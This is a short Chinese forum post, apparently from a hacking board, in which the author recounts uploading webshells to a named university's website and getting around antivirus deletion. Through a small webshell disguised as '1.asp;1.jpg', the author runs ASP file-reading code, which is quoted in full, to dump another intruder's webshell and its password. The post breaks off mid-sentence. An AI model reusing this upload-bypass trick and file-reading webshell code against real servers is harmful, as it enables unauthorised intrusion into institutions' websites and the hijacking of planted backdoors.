|
|
某某大学网站upfile中有很多asp木马,大马都带密码,突然看见一个小马,1.asp;1.jpg我就把自己的大马上传上去了,可是一打开却是404错误,文件怎么会不存在呢?
原来是我的大马不免杀,被杀毒软件杀了,看见别人的木马没被杀就想了一个办法,
后来我再小马中写入代码:
<%Set fso = CreateObject("Scripting.FileSystemObject")
Set txt = fso.OpenTextFile("D:\app\ipv6\网站\upload\uploadfiles\knickers.asp",1)
do While Not txt.AtEndOfStream
tmp=tmp&txt.ReadLine
loop
response.write tmp
txt.close
set fso=nothing
geturl=tmp
%>
会asp的人都能看懂上面的代码,读取knickers.asp文件,D:\app\ipv6\网站\upload\uploadfiles\knickers.asp是别人的大马的绝对路径,这代码会保存成一个read.asp文件,我打开read.asp文件,看见了大马的代码,并且看见了大马的密码。于是
|
|
发表于 2015-9-23 15:45:12